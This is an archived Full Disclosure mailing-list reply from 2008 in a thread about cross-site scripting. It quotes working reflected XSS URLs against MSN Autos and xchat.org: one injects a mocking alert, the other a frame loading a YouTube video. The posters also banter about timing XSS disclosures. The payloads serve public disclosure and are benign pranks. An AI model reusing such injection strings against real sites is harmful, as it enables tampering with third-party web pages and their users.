Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: XSS in XChat.org

From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Sat, 19 Apr 2008 20:15:17 +0200
http://autotrader.autos.msn.com/fyc/index.jsp?hide_nav=true&page=atcPartner&address=&year=&make=&model=&certified=&distance=25&search_type=both&LNX=MSNATMSNBCCLASSFYC&apos;);%7D%7Dalert('n3td3v%20sucks');%20function%20vvv()%7B%20if%20(0==0)%20%7Bvar%20ho=('&icid=autos_msnbc_2&num_records=25&h000=n000'%22%3E/

On 19/04/2008, n3td3v <xploitable () gmail com> wrote:


On Sat, Apr 19, 2008 at 4:06 AM, Steve Cooperman <worried () gmail com>
wrote:



http://xchat.org/cgi-bin/checkupdate.pl?version=2.8.8%22%3E%3Cframe%20src=%22http://youtube.com/watch?v=oHg5SJYRHA0




--
Love,
Steve Cooperman



I've noticed an increase in web application stuff on the list since April
15th.
Please only post these on May 1st...
it will look better if the list is full of xss for one day...and send
out a bigger message to the powers that be who don't take web
application security seriously enough.

Btw, I see what you did there with the e-mail address, nice.

All the best,

n3td3v

Web Application Security Awareness Day
http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061507.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: